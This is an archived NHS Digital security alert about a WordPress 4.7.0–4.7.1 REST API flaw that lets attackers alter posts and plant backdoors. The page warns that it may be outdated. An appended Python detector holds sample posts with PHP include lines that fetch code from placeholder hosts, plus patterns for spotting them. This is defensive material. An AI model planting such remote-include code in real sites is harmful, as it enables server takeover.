
WordPress Vulnerability Allows Unauthorised Modification of Websites


This content has been archived

This article no longer conforms to NHS Digital's standards for cyber alerts, and may contain outdated or inaccurate information. Use of the information contained in this page is at your own risk.

Summary

An easy-to-exploit vulnerability in WordPress allows attackers to modify the content and upload any post within a WordPress website.

Affected platforms

The following platforms are known to be affected:

Threat details

The vulnerability exists in WordPress’ REST API (Representational State Transfer Application Program Interface) plugin, which is designed to let programs on the internet talk to each other easily by using a standardised language. The REST API is enabled by default in WordPress versions 4.7.0 and 4.7.1.

The attacker takes advantage of a weakness in the REST API's PHP code, which allows them to bypass the authentication required when publishing posts and gives them the ability to amend any part of the website.

Update: CareCERT has escalated this threat to Medium, following the compromise of thousands of vulnerable WordPress websites on the internet, including some defaced with terrorist propaganda. Attackers have also found a way to exploit the vulnerability further by installing their own PHP code into WordPress sites via the REST API flaw, which could then be used to include a remote PHP file on the victim’s site. This in turn would download and install a backdoor, allowing the attacker to take over the victim’s server.


Remediation steps

  • Ensure you have updated to WordPress version 4.7.2 as a patch has been released.
  • Enable automatic updates for WordPress where possible.
  • Consider deploying specific security solutions for content management systems, such as application firewalls.
  • Disable any plugins that allow an editor to embed and update PHP code.
  • Attacks can be detected using the shortcodes associated with plugins like Exec-PHP and Insert PHP.
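
One way to run the shortcode check from the last remediation step, as an added example that is not part of the original alert. It assumes post content has been exported as records with `id` and `content` fields, and the tag names it searches for (`insert_php`, `php`, raw `<?php` blocks) are assumptions about how these plugins mark embedded code; the sample posts are constructed.

```python
import html
import re

# Assumed tag names: "insert_php" (Insert PHP shortcode); "php" and raw
# <?php blocks are assumptions covering Exec-PHP style content.
SHORTCODE_RE = re.compile(
    r"\[\s*(insert_php|php)\b[^\]]*\](.*?)\[\s*/\s*\1\s*\]", re.I | re.S)
RAW_PHP_RE = re.compile(r"<\?php(.*?)(?:\?>|\Z)", re.I | re.S)
# include/require whose argument is a remote URL (the remote PHP file
# inclusion the alert describes).
REMOTE_INCLUDE_RE = re.compile(
    r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]((?:https?|ftp)://[^'\"]+)['\"]",
    re.I)

def _finding(post_id, kind, body):
    urls = REMOTE_INCLUDE_RE.findall(body)
    return {"post_id": post_id, "kind": kind, "remote_includes": urls,
            "severity": "high" if urls else "review"}

def scan_post(post):
    """Return findings for one post given as a dict with 'id' and 'content'."""
    # Brackets and quotes may be stored as HTML entities; decode before matching.
    text = html.unescape(post["content"])
    findings = [_finding(post["id"], "shortcode:" + m.group(1).lower(), m.group(2))
                for m in SHORTCODE_RE.finditer(text)]
    findings += [_finding(post["id"], "raw_php", m.group(1))
                 for m in RAW_PHP_RE.finditer(text)]
    return findings

def scan_posts(posts):
    """Scan every post and return all findings, remote includes first."""
    found = [f for p in posts for f in scan_post(p)]
    return sorted(found, key=lambda f: (f["severity"] != "high", f["post_id"]))

# Constructed sample data (not taken from any real site or incident).
SAMPLE_POSTS = [
    {"id": 1, "content": "<p>Clinic opening hours have changed.</p>"},
    {"id": 2, "content": "Hi [insert_php] include('http://files.example.invalid/x.php'); [/insert_php]"},
    {"id": 3, "content": "&#91;PHP&#93; echo date('Y'); &#91;/PHP&#93;"},
    {"id": 4, "content": "<?php require_once \"https://cdn.example.invalid/a.php\"; ?>"},
]

if __name__ == "__main__":
    for finding in scan_posts(SAMPLE_POSTS):
        print(finding)
```

Findings marked `review` contain embedded PHP without a remote include and still need a human to confirm whether an editor placed them there legitimately.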

Last edited: 17 February 2020 11:41 am